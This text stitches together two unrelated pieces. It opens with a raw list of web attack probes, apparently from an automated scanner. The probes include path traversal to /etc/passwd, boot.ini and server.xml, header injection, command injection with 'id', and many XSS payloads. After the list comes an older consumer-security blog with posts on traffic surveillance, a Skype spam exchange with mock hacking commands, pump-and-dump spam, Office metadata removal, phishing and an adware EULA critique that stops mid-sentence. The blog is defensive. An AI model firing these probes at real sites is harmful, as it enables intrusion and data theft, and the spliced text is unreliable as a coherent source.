"\..\..\..\..\..\..\..\..\..\..\etc\passwd"
"C:\boot.ini"
"C:/boot.ini"
"/../../../../../../../../../../../boot.ini"
"/../../../../../../../../../../../boot.ini"
"/../../../../../../../../../../../etc/passwd"
"/../../../../../../../../../../../etc/passwd"
"
InjectedHeader: InjectedValue"
""";id"""
"|id|"
"/index.html|id|"
"../../../../../../../../conf/server.xml"
"<script>SPIXSSMXBZNlJSdDliclN1eDZrUVdFU2Nndz09bGljZW5zZQSSXIPS</script>"
""" style=""background:url(javascript:alert(SPIXSSMXBZNlJSdDliclN1eDZrUVdFU2Nndz09bGljZW5zZQSSXIPS))""
"""
"'><script>alert('SPIXSSMXBZNlJSdDliclN1eDZrUVdFU2Nndz09bGljZW5zZQSSXIPS')</script><'"
"""><script>alert(""SPIXSSMXBZNlJSdDliclN1eDZrUVdFU2Nndz09bGljZW5zZQSSXIPS"")</script><"""
"' alert('SPIXSSMXBZNlJSdDliclN1eDZrUVdFU2Nndz09bGljZW5zZQSSXIPS') '"
""" alert('SPIXSSMXBZNlJSdDliclN1eDZrUVdFU2Nndz09bGljZW5zZQSSXIPS')
"""
"<\0script>alert(""SPIXSSMXBZNlJSdDliclN1eDZrUVdFU2Nndz09bGljZW5zZQSSXIPS"");<s\0cript>"
"<IMG SRC=""javascript:alert('SPIXSSMXBZNlJSdDliclN1eDZrUVdFU2Nndz09bGljZW5zZQSSXIPS');"">"
"""><LINK REL=""stylesheet"" HREF=""javascript:alert('SPI_XSS');"">"
"""><IMG STYLE='xss:expre\ssion(alert('SPIXSSMXBZNlJSdDliclN1eDZrUVdFU2Nndz09bGljZW5zZQSSXIPS'))'>"
"""><BODY ONLOAD=alert('SPIXSSMXBZNlJSdDliclN1eDZrUVdFU2Nndz09bGljZW5zZQSSXIPS')>"
"""><STYLE>@im\port""\ja\vasc\ript:alert('XSS')"";</STYLE>"
"""><IMG SRC='vbscript:msgbox(""SPIXSSMXBZNlJSdDliclN1eDZrUVdFU2Nndz09bGljZW5zZQSSXIPS"")'><"""
"""><TABLE BACKGROUND=""javascript:alert('SPIXSSMXBZNlJSdDliclN1eDZrUVdFU2Nndz09bGljZW5zZQSSXIPS')""><"
"<script>SPIXSSYW5yNUk5SzJpWEFySkJwMEtIOUdCdz09bGljZW5zZQSSXIPS</script>"
""" style=""background:url(javascript:alert(SPIXSSYW5yNUk5SzJpWEFySkJwMEtIOUdCdz09bGljZW5zZQSSXIPS))""
"""
"'><script>alert('SPIXSSYW5yNUk5SzJpWEFySkJwMEtIOUdCdz09bGljZW5zZQSSXIPS')</script><'"
"""><script>alert(""SPIXSSYW5yNUk5SzJpWEFySkJwMEtIOUdCdz09bGljZW5zZQSSXIPS"")</script><"""
"' alert('SPIXSSYW5yNUk5SzJpWEFySkJwMEtIOUdCdz09bGljZW5zZQSSXIPS') '"
""" alert('SPIXSSYW5yNUk5SzJpWEFySkJwMEtIOUdCdz09bGljZW5zZQSSXIPS')
"""
"<\0script>alert(""SPIXSSYW5yNUk5SzJpWEFySkJwMEtIOUdCdz09bGljZW5zZQSSXIPS"");<s\0cript>"
"<IMG SRC=""javascript:alert('SPIXSSYW5yNUk5SzJpWEFySkJwMEtIOUdCdz09bGljZW5zZQSSXIPS');"">"
"""><IMG STYLE='xss:expre\ssion(alert('SPIXSSYW5yNUk5SzJpWEFySkJwMEtIOUdCdz09bGljZW5zZQSSXIPS'))'>"
"""><BODY ONLOAD=alert('SPIXSSYW5yNUk5SzJpWEFySkJwMEtIOUdCdz09bGljZW5zZQSSXIPS')>"
"""><IMG SRC='vbscript:msgbox(""SPIXSSYW5yNUk5SzJpWEFySkJwMEtIOUdCdz09bGljZW5zZQSSXIPS"")'><"""
"""><TABLE BACKGROUND=""javascript:alert('SPIXSSYW5yNUk5SzJpWEFySkJwMEtIOUdCdz09bGljZW5zZQSSXIPS')""><"
- Pondering Security and My Perspective...
Any given day of the week (and many weekends) I keep myself busy with the task of trying to insure that end-user's computers are free of whatever the spy / ad / greyware of the day might be. Making sure that their shopping habits or surfing history are not transmitted to some faceless company. It is a never-ending struggle.
It came as a bit of a wakeup call that, no matter what I do to keep the desktop clean, there are still other dangers out there.
It turns out that all the internet traffic in my hometown is being funnelled, collected and forwarded on a massive scale. Let's sidestep the obvious violations of privacy here a for a second. We have terrabytes of daily traffic being collected and stored in large repositories. How sweet of a target would that be for any scam artists? A skilled Cracker? The Mob? I can only imagine, given a days worth of all SanFran e-mail and IM traffic, what one could rake in with a simple (automated?) blackmail scheme...
Won't happen? There must be tight security measures in place to protect against these things, right?
Eh... On the same day another story broke. The "border security" sytem which is supposed to protect the US from terrorist (fellow "Aliens" know this as "the gizmo with the cheap webcam and flaky fingerprint reader") was taken to its knees by a stray worm because of unpatched computers.
Darn it. Should have taken the blue pill!
- My First Experience with SKYPE Spim / Spam- Instant Classic
Skype, recently acquired by eBay, is becoming a very popular Instant Messenging client. You can text chat, hold conferences, send files and most importantly talk in real time with wonderful clarity. Not only can you talk to just those on your Skype list, but you can also by credits to dial out to real world lines. Skype is a proprietary peer-to-peer Internet telephony (VoIP) network, founded by Niklas Zennstrom and Janus Friis, the creators of KaZaA.
I have been using Skype for sometime but never before had I received an unsolicited commercial message in my months of usage. In terms of e-mail this is commonly called spam but on instant messenging networks this is called SPIM. In short someone contacts you hawking goods and wares, or anything that you don't want. You don't know them, you did not contact them, did not opt-in to be contacted by them, in short they simply hammer out commercial messages in hopes someone will buy.
I found this case particularly interesting because, as I said before, I had never received SPIM through Skype (and fortunately it is easy to block a user.) In this case I decided to "play" with the spammer to gauge their response and have some fun and games.
Would they ignore me? Hit me with more unwanted spam? Or are they truly ignorant? Find below the full transcript of our "conversation". Obviously near the end I was pretending to execute various "commands" on her machines when in reality I was doing nothing but typing in all caps simulating a "look up" of who they were.
This spammer was not harmed in the incident, but let's hope they don't do it again. Read on...
The first part of the transcript is the list of brand new units of phones they sell, below it you will find our "dialogue" and my simulated commands of geolocation as I tried to steer this spammer into the path of not doing it again. I doubt that will work, but it is amusing nonetheless. More below...
[1:40:47 PM] nikky vo... says: Hello,
We are phones and laptops manufacturers of MEGA WORLD INTERNATIONAL LTD,we sell phones and laptops at very cheap rate.If you require our goodswhich also include electronics gadgets,get back to me on our company email address (
phonesbonanza@yahoo.com or also on this email address
megaworldcomputers@yahoo.com)
VIEW OUR PRICE LIST BELOW -- ALL BRAND NEW UNITS:
Models: Price:
Nokia 1100-- US$55
Nokia 2100-- US$45
Nokia 2300-- US$60
Nokia 3100-- US$65
Nokia 3108-- US$60
Nokia 3200-- US$75
Nokia 3230-- US$95
Nokia 3300 - US$85
Nokia 3310-- US$25
Nokia 3315-- US$29
Nokia 3330-- US$30
Nokia 3350-- US$35
Nokia 3410-- US$35
Nokia 3510-- US$40
Nokia 3510i-- US$45
Nokia 3530-- US$50
Nokia 3595-- US$45
Nokia 3610-- US$55
Nokia 3650-- US$100
Nokia 3660-- US$105
Nokia 5100-- US$65
Nokia 5140-- US$110
Nokia 5210-- US$40
Nokia 5510-- US$105
Nokia 5550-- US$50
Nokia 5170iR-- US$39
Nokia 6020-- US$130
Nokia 6670-- US$105
Nokia 6100-- US$80
Nokia 6108-- US$90
Nokia 6220-- US$100
Nokia 6230-- US$90
Nokia 6260-- US$135
Nokia 6310-- US$69
Nokia 6310i-- US$70
Nokia 6500-- US$60
Nokia 6510-- US$60
Nokia 6600-- US$135
Nokia 6610-- US$80
Nokia 6630-- US$175
Nokia 6170-- US$145
Nokia 6650-- US$82
Nokia 6800-- US$105
Nokia 6820-- US$110
Nokia 7200-- US$125
Nokia 7210 Turquoise-- US$90
Nokia 7230-- US$100
Nokia 7250-- US$100
Nokia 7250i-- US$100
Nokia 7260-- US$135
Nokia 7280-- US$155
Nokia 7600-- US$165
Nokia 7610-- US$105
Nokia 7650-- US$120
Nokia 7710--US$130
Nokia 770--US$110
Nokia 8250-- US$65
Nokia 8310-- US$90
Nokia 8910 Titanium-- US$110
Nokia 8910 Black-- US$125
Nokia 8910i-- US$100
Nokia 8890-- US$90
Nokia 8850 Special Edition-- US$80
Nokia 8850 Gold Edition-- US$90
Nokia 8855-- US$115
Nokia 9210 Communicator-- US$105
Nokia 9210i Communicator-- US$100
Nokia N-Gage-- US$110
Nokia 9500 (communicator)-- US$120
N91--US$150
N90--US$180
N70---US$200
Nokia--vertuUS$300
And more........
Sony Ericsson P800-- US$100
Sony Ericsson P900-- US$120
Sony Ericsson P910i-- US$100
Sony Ericsson T20e-- US$35
Sony Ericsson T20s-- US$39
Sony Ericsson T28s-- US$39
Sony Ericsson T28 World-- US$45
Sony Ericsson T29s-- US$49
Sony Ericsson T100-- US$30
Sony Ericsson T105-- US$35
Sony Ericsson T200-- US$45
Sony Ericsson T230-- US$55
Sony Ericsson T300-- US$55
Sony Ericsson T310-- US$50
Sony Ericsson T600-- US$69
Sony Ericsson T610-- US$90
Sony Ericsson T630-- US$85
Sony Ericsson T68i-- US$70
Sony Ericsson T68m-- US$80
Sony Ericsson Z200-- US$80
Sony Ericsson Z600-- US$90
Sony CMD-J5-- US$30
Sony CMD-Z7-- US$35
Sony CMD-J7-- US$40
Sony CMD-J6-- US$40
Sony CMD-Z5-- US$90
Sony CMD-MZ5-- US$105
Sony Ericsson R520m-- US$90
Sony Ericsson R380 World-- US$90
Sony Ericsson R380s-- US$105
Sony Ericsson R600-- US$35
Sony Ericsson S700-- US$100
Sony Ericsson K500i-- US$100
Sony Ericsson K700i-- US$100
sony Ericson w800i-- US$200
And more........
Samsung SGH A200-- US$50
Samsung SGH A300-- US$40
Samsung SGH A500-- US$70
Samsung SGH A800-- US$70
Samsung SGH C100-- US$85
Samsung SGH E400-- US$125
Samsung SGH E600-- US$129
Samsung SGH E700-- US$100
Samsung SGH E720-- US$200
Samsung SGH E715-- US$100
Samsung SGH-E810-- US$100
Samsung SGH-E820-- US$90
Samsung SGH-E800-- US$80
Samsung SGH-E850-- US$140
Samsung SGH D410-- US$150
Samsung SGH D500-- US$155
Samsung SGH P400-- US$135
Samsung SGH P510-- US$90
Samsung SGH N188-- US$80
Samsung SGH N288-- US$60
Samsung SGH N500-- US$60
Samsung SGH N620-- US$60
Samsung SGH M100-- US$45
Samsung SGH P400-- US$140
Samsung SGH P410-- US$145
Samsung SGH P500-- US$155
Samsung SGH Q105-- US$40
Samsung SGH Q300--- US$70
Samsung SGH R220-- US$30
Samsung SGH R225-- US$25
Samsung SGH S100-- US$90
Samsung SGH S200-- US$100
Samsung SGH S300-- US$105
Samsung SGH S307-- US$130
Samsung SGH S500-- US$109
Samsung SGH T100-- US$100
samsung SGH S105-- US$35
Samsung SGH T200-- US$125
Samsung SGH T400-- US$60
Samsung SGH T500-- US$90
Samsung SGH T700-- US$99
Samsung SGH V200-- US$105
Samsung SGH VM680-- US$100
Samsung SGH X400-- US$105
Samsung SGH X410-- US$130
Samsung SGH X426-- US$129
Samsung SGH-C200-- US$125
Samsung SGH-X460-- US$140
Samsung SGH-X450-- US$130
Samsung SGH-X120-- US$99
Samsung SGH X600-- US$145
Samsung SGH-X610-- US$140
Samsung SGH-Z105-- US$120
And more...
Motorola A008-- US$50
Motorola A388-- US$70
Motorola A388c-- US$120
Motorola A820-- US$65
Motorola A780--$200
Motorola C330-- US$20
Motorola C331-- US$25
Motorola C332-- US$30
Motorola C333-- US$35
Motorola C350-- US$69
Motorola E360-- US$60
Motorola E365-- US$110
Motorola E380-- US$95
Motorola E398-- US$125
Motorola MPX200-- US$180
Motorola Accompli 008-- US$49
Motorola Timeport 280-- US$80
Motorola T190T-- US$25
Motorola Talkabout 191-- US$25
Motorola T720-- US$65
Motorola T720i-- US$85
Motorola V3Razor-- US$100
Motorola V66-- US$60
Motorola V60-- US$70
Motorola V60i-- US$75
Motorola V70-- US$105
Motorola V80-- US$115
Motorola V290-- US$80
Motorola V750-- US$125
Motorola V3688+-- US$20
Motorola V8088-- US$30
Motorola V525-- US$120
Motorola V300-- US$100
Motorola V400-- US$125
Motorola V500-- US$100
Motorola V600-- US$120
Motorola mpx --US$200
And more.....
Siemens A35-- US$15
Siemens A40-- US$19
Siemens A50-- US$25
Siemens A52-- US$29
Siemens A55-- US$30
Siemens C45-- US$30
Siemens C55-- US$35
Siemens CL50-- US$70
Siemens CL55-- US$65
Siemens CT56-- US$30
Siemens M50-- US$35
Siemens M55-- US$120
Siemens MC60-- US$79
Siemens ME45-- US$50
Siemens S45-- US$60
Siemens SL42-- US$65
Siemens SL45i-- US$69
Siemens S55-- US$85
Siemens SL55-- US$125
Siemens SX45-- US$155
Siemens SX1-- US$180
Siemens Xelibri 1-- US$60
Siemens Xelibri 2-- US$50
Siemens Xelibri 3-- US$80
Siemens Xelibri 4-- US$80
Siemens Xelibri 5-- US$65
Siemens Xelibri 6-- US$85
Siemens Xelibri 7-- US$85
Siemens Xelibri 8-- US$95
siemens Xk65 US$200
And more.....
Panasonic G50-- US$80
Panasonic G51-- US$95
Panasonic GD35-- US$20
Panasonic GD52-- US$25
Panasonic GD55-- US$49
Panasonic GD67-- US$39
Panasonic GD75-- US$45
Panasonic GD87-- US$125
Panasonic GD88-- US$129
Panasonic GD90-- US$30
Panasonic GD92-- US$30
Panasonic GD93-- US$20
Panasonic GD95-- US$39
Panasonic X70-- US$120
Panasonic X66-- US$110
Panasonic X68-- US$115
Panasonic A101-- US$90
Panasonic A102-- US$100
And more....
Alcatel OneTouch 301-- US$20
Alcatel OneTouch 302-- US$25
Alcatel OneTouch 303-- US$30
Alcatel OneTouch 511-- US$35
Alcatel OT525-- US$39
Alcatel One Touch 501-- US20
Alcatel One Touch 311-- US$25
Alcatel One Touch 701-- US$30
Alcatel One Touch 512-- US$40
Alcatel One Touch 715-- US$55
And more.....
NEC N830-- US$85
NEC N710-- US$70
NEC C616-- US$110
NEC N900-- US$100
NEC N820-- US$80
NEC N910-- US$100
NEC N700-- US$55
And more......
Sharp GX1-- US$99
Sharp GX10-- US$110
Sharp GX10i-- US$110
Sharp GX15-- US$110
Sharp GX20-- US$125
Sharp GX30-- US$135
And more....
Philips Fisio 120-- US$25
Philips Fisio 311-- US$30
Philips Fisio 620-- US$35
Philips Fisio 825-- US$35
Philips Ozéo 8@8-- US$45
Philips Xénium-- US$45
Philips Fisio 820 + Kit Blue-- US$49
And more....
Nextel i55sr-- US$65
Nextel i2000plus-- US$35
Nextel i58sr-- US$30
Nextel i530-- US$35
Nextel i205-- US$20
Nextel i305-- US$25
Nextel i35s-- US$29
Nextel i88-- US$30
Nextel i90-- US$59
Nextel i95cl-- US$70
Nextel i60c-- US$40
Nextel 6510TM-- US$100
Nextel i730-- US$85
Nextel i733-- US$95
Nextel i736-- US$105
Nextel i830-- US$115
Nextel i860-- US$105
Nextel i930-- US$100
And more...
Audiovox 8500-- US$30
Audiovox 8300-- US$39
Audiovox 9100-- US$15
Audiovox 9150-- US$75
Audiovox 9155-- US$35
And more....
kyocera 5135-- US$10
kyocera 2035-- US$25
kyocera 7135-- US$10
....kyocera 2135-- US$25
[1:53:32 PM] Wayne P... says: Nikky you are aware I work with the Skype Spim Department?
[2:06:30 PM] nikky vo... says: ?
[2:08:17 PM] Wayne P... says: Nikky- you are sending unwanted commercial messages. Furthermore they are accompanied by some sort of subliminal sound which I am recording for analysis in our backmasking lab.
[2:08:43 PM] Wayne P... says: Spim- is spam through an IM network. You are aware of the ramifications of this?
[2:10:36 PM] nikky vo... says: what do you mean?
[2:10:52 PM] nikky vo... says: cant i advertise my goods
[2:11:08 PM] Wayne P... says: Not in this fashion. Perhaps you should read up on Internet law.
[2:12:02 PM] Wayne P... says: about unwanted advertising through various channels like e-mail and IM services. We have no prior business relationship, I have not opted in to received your ads- thus this is considered spam.
[2:12:35 PM] Wayne P... says: Unfortunately this is a severe violation. Especially with the strange subliminal sound you are playing in background.
[2:13:09 PM] Wayne P... says: Nikky. Would you want me to do this to you?
[2:13:54 PM] Wayne P... says: OK. You leave me choice I must file an official complaint unless you can promise you will never do this again and get yourself in a lot of trouble.
[2:15:34 PM] nikky vo... says: can u pls tell me where to advertise
[2:16:50 PM] Wayne P... says: Nikky I am not a consultant but there are other options. For example Yahoo offers advertising, as does Google Adwords, you could auction goods on ebay or build a storefront with Yahoo and promote your website through quality content and build a respectable business.
[2:17:23 PM] Wayne P... says: INITIATING REVERSE IP TRACE...
[2:17:38 PM] Wayne P... says: OBTAINING GEOLOCKING PARAMETERS...STANDBY
[2:18:44 PM] Wayne P... says: PARAMETERS OBTAINED. ENTERING HEX SHELL...
[2:18:56 PM] Wayne P... says: >COMMAND OP GEOLOCATE
[2:19:03 PM] nikky vo... says: ????????
[2:19:05 PM] Wayne P... says: >DUMP TRACE
[2:19:48 PM] Wayne P... says: TRACE DUMP COMPLETE...STANDBY
[2:19:54 PM] Wayne P... says: ABUSE REPORT SENT
[2:20:08 PM] Wayne P... says: >EXIT HEX SHELL
[2:20:31 PM] nikky vo... says: what the hell u saying?
[2:20:47 PM] Wayne P... says: PLOTTING TO GOOGLE MAPS API
[2:21:32 PM] Wayne P... says: ENTERING HEX SHELL
[2:22:03 PM] Wayne P... says: >PLOT IP ADDRESS NIKKY VONNE // > GOOGLE MAPS API
[2:22:11 PM] Wayne P... says: >EXECUTE LOCATE RESIDENCE
[2:22:56 PM] Wayne P... says: STANDBY. PROCESSING GEOLOCATION.
[2:23:23 PM] Wayne P... says: TARGET MAPPED. CONTACT REPORT SENT TO SPAM OFFICIALS.
[2:23:41 PM] Wayne P... says: >EXIT HEX SHELL
[2:23:58 PM] Wayne P... says: INITIATE BLOCKING PROTOCOLS
[2:24:11 PM] Wayne P... says: TERMINATING CONNECTION IN
[2:24:27 PM] Wayne P... says: 10...9...8...7...6...5...4...3...2...1..
- Pump & Dump Stock Picks- How to Avoid
Did you know we had a Mail Bag? We do! Our team, including two MSFT Security MVPs, select good questions from the Mail Bag and give it our best shot.
Question: I receive lots of hot stock tips in my email. Are these legitimate stocks? Should I invest?
Disclaimer: We don't give investment advice...but what you are referring to is commonly called a Pump & Dump stock scam.
Like many people you probably get alot of spam- even with the better filters we have today. Have you ever noticed how many spams are touting a particular stock? Usually this is a slimly traded stock on a small exchange for only pennies a share. In a recent Honeypot studied it was found that 3% of all the spam collected were actually pump & dump scams! Still at pennies a share it seems so easy to make money! Not so.
New research was released recently about these "pump and dump" schemes. The way it works is the stock owners or holders send out massive amounts of spam touting their stock, somtimes resorting to pumping them on up on stock related message boards with false or misleading claims.
What was really interesting in this study is the researchers found that the more spam sent actually sent the stock of the price higher- naturally the scamsters unload the stock as it peaks and the regular investors are left holding the bag.
Answer: If you get e-mails like these simply hit delete. They are more than likely scammers tricks stacked against you in order to part you from your hard earned money. The only ones profiting from these "spam e-mail tips" are the senders themselves- in this case spammers.
For more on Pump & Dump Stock Scams read this illuminating article.
If you still aren't sure check out this savvy fellow who charted a variety of spam touted stocks and see for yourself just how "good" the returns where: Spamstocktracker.com. We suspect that some of these fraudsters might using botnets as spam relays so they can send out literally millions of these types of thinly traded, dubious equities.
Imagine that- a whole legion of zombie machines working OTC stocks. Again- hit delete and don't fall for it.
- Getting Rid of Meta Data...The Hidden Trail You May Not Know About
Office 2003/XP Add-in: Remove Hidden Data
We talked about this a couple of years ago but as tips and tricks go it is a must have in your privacy toolset and best of all it's free.
Did you know that when you edit a Microsoft Word document there are all kinds of hidden meta-data in the document that you cannot see? With this little add-in you can permanently remove hidden and collaboration data, such as change tracking and comments, from Word 2003/XP, Excel 2003/XP, and PowerPoint 2003/XP files. If only certain government officials had known about the tool because meta-data has led to a few scandals in the past!
The Remove Hidden Data add-in is a tool that you can use to remove personal or hidden data that might not be immediately apparent when you view the document in Microsoft Office. The tool is free but only works in 2003/XP.
Here is sample output on a file that has had hidden data removed.
C:\Documents and Settings\Docs\My Documents\file.doc scanned at 1:49:55 PM on 3/30/2004
Different revisions of document not found.
Comments not found.
Early document versions not found.
Document template other than normal not found.
VB Module descriptions failed to remove. Reason: If the "Trust Access to Visual Basic Project" security setting is disabled, the tool cannot determine if the document contains a macro. Macros might contain personal information. Review security settings and macros and delete any that contain personal information.
Smart Tags found and removed.
SendForReview RCIDs not found.
Store random number in the document check found and removed.
Embedded objects not found.
Hidden Text not found.
Same-color text not found.
Custom properties not found.
Header and footer not found.
Hyperlinks found and user prompted. Result: kept
File Paths not found.
Bookmarks not found.
DSNs not found.
Field Codes not found.
VB Modules not found.
C:\Documents and Settings\Docs\My Documents\file.doc scanning complete
Pretty handy! Here is the skinny from the Microsoft site and where to get the free tool...we recommend you add it to your digital toolbox.
With this add-in you can permanently remove hidden and collaboration data, such as change tracking and comments, from Word 2003/XP, Excel 2003/XP, and PowerPoint 2003/XP files.
When you distribute an Office document electronically, the document might contain information that you do not want to share publicly, such as information you’ve designated as "hidden" or information that allows you to collaborate on writing and editing the document with others.
The Remove Hidden Data add-in is a tool that you can use to remove personal or hidden data that might not be immediately apparent when you view the document in your Microsoft Office application.
You can run the Remove Hidden Data add-in on individual files from within your Office XP or Office 2003 application. Or, you can run Remove Hidden Data on multiple files at once from the command line. In either case, to run the tool you must have the application installed in which the document was created.
The Offrhdreadme.htm file included with the add-in includes a complete list of all of the types of data that the tool will help to remove. By default, you can locate this file in the \Program Files\Microsoft Office\Remove Hidden Data Tool\1033 directory in the drive where you installed the tool. If you installed the tool to a different directory, you can locate this file in the \1033 directory, a subdirectory of the add-in installation folder.
Notes
- You should run the Remove Hidden Data add-in on files when you are ready to publish them. This is because some of the data that the tool removes is used by Office for collaboration features, such as Track Changes, Comments, and Send for Review.
- You should always save to a new file name, rather than overwrite the original file with the new document, in order to preserve a copy of the document containing the original data.
-The Remove Hidden Data add-in does not work with Information Rights Management-protected or digitally-signed files.
Download- Remove Hidden Data Tool
- Phishing- What is it in a Nutshell?
Phishing is a form of criminal activity using social engineering or trickster techniques to fraudulently acquire sensitive information, such as passwords and credit card details, by masquerading as a trustworthy person or business in an apparently official electronic communication, such as an email or an instant message. The term phishing arises from the use of increasingly sophisticated lures to "fish" for users' financial information and passwords.
Phishing attempts that target employees of an particular company are often called "Spear Phishing". There is a current bill called the Anti-Phishing Act of 2005 now under debate and other community-driven methods are underway to attack phishers like the Phried Phish project from Castlecops where you can submit phishing address and skilled hunters will go after them and get them shutdown!
Coming soon...a bevy of tools and techniques to help protect your self from phishing.
- Research in Progress...From The Mountains of WV
Ever wonder what the inside of part of an anti-spyware lab might look like? What actual researchers do? This short segment aired on WSAZ, an MSNBC affiliate profiling our Huntington, West Virginia research team.
Click The Photo for Footage
But there's more coming up! Check out the teaser piece on the scoop with this two-part Podcast Chris Boyd and I delivered to Jeff Molander profiling what we see in the trenches of the Internet and information on our team's latest bust. I think it will truly "shock and awe" some listeners. Check out Spyware Warriors and the Digital Underground Teaser [mp3 format]
- EULA Madness Tinko Pal Revisited With Commentary
I am really ready to start tackling EULAs, so to kick things off I am revisiting a piece I did on the TinkoPal EULA months ago. Take a close look as I highlight some of the language and conditions you would accept in this EULA. For added value my comments will be in bold text surrounded by parentheses and are not a part of the EULA.
TinkoPal EULA Page: http://www.tinkopal.com/terms.html
Note: The original EULA is longer valid at this URL.
** Flesch Grade: 22 = Beyond Twelfth Grade Reading Level. I mention this because part of the analysis strategy we have put into place at Facetime Security Labs is EULA dissection. I promise much more to come on that soon! In this case to receive your Tinkopal and whatever might come along with it (the world is full of surprises) the agreement you accept is well beyond the 12th grade reading level. I hope you have a college degree handy.
In this EULA there are some interesting clauses that might surprise the user if not read carefully. Here are a few reasons people don't seem to care for the after effects of an adware install- especially in the Enterprise environment. This agreement (which again requires the equivalent of a college degree to truly understand it) is patently ridiculous and potentially dangerous because it grants the company the ability to upload arbitrary code. Our advice is to avoid the application completely.
Let's take a deep dive and look at some key aspects of this EULA.
Once again- my comments will be in bold text surrounded by parentheses and are not a part of the EULA.
Sentence 5: By accepting to download the TinkoPal you are also accepting that TinkoPal may also deliver to you advertisements. (So if you take the download you can expect advertisements- you don't know what kind or where, only there will be advertisements.)
Sentence 6: The timing, frequency, placement and extent of advertising is subject to change and shall be determined by TinkoPal at its sole discretion. (You might get one ad a day, or you might get a hundred ads a day- it is entirely up to them.)
Sentence 7: TinkoPal may from time to time, at its sole discretion, provide automatic upgrades to the Software through electronic dissemination and other means to add capabilities, functionality, or enhancements and may also include third party applications with its upgrades. (This is a deal killer- Tinkopal is basically saying they can upload third party applications to your machine with an "upgrade"- what kind of applications? You don't know.)
Sentence 26: Modifications of Agreement TinkoPal may modify this Agreement or the Software or Services provided at any time without providing notice to you. (Nice one- they can change, modify or do about anything they want, and they don't have to tell you about it. Completely absurd.)
Sentence 27: Such modification will be made by posting a revised agreement on its web site and such modification shall be deemed effective immediately upon posting of the modified Agreement. (Strange- if they do modify the agreement it is effective instantly upon posting the modified agreement which in the sentence above, they just told you they didn't have to tell you about.)
Sentence 35: Attached Files This Product contains and will install technology that enables third party companies, sponsors, advertisers or TinkoPal to deliver additional products or software applications to the End-Users' system. (OK pretty clear you will get technology that enables other companies, whoever they are, to deliver you even more products or applications that we really don't know anything about.)
Sentence 39: TinkoPal also includes thirdparty applications from our advertising partner (ABI NETWORK ADVERTISING SOFTWARE) Terms and conditions: http://www.abetterinternet.com/policies.htm 1. Acceptance of This Agreement - This End User License Agreement ("Agreement") is a contract between you ("you") and BetterInternet, LLC ("ABI") and governs your use of software downloaded from abetterinternet.com ("Software"). Please read the terms of this Agreement carefully before downloading, installing and using the Software. (This is one piece of good advice- read this masterpiece carefully because it is set up so that you lose in the deal.)
Sentence 40: This Software will collect information about websites you access and will use that information to display advertising on your computer. (Somehow I don't find this surprising; basically they will collect information about where you go so they can give you ads, wonder if they collect your secure banking URLS?)
Sentence 42: Moreover, the ads will appear while you are surfing the Web, not just when you use the Software. (This is a great added value. Not only do you get ads for using the software, you get them while you surf, and remember from the clause above we really don't know how many you are going to get. Pick a number- no wait they get to pick the number.)
Sentence 45: 2. Functionality - This Software delivers advertising as well as various promotional messages to your computer screen while you view Internet web pages. (We know that, but I am not sure what kind of advertising I am getting or exactly where or how these promotional messages are going to be delivered.)
Sentence 47: In addition, the Software may be bundled with or installed in connection with Promotional Applications (see Section 14 below for more information about Promotional Applications). By installing the Software, you understand and agree that the Software may, without any additional notice to you, perform the following: display pop-up ads and various other ad formats of third party advertisers; display links to and advert |
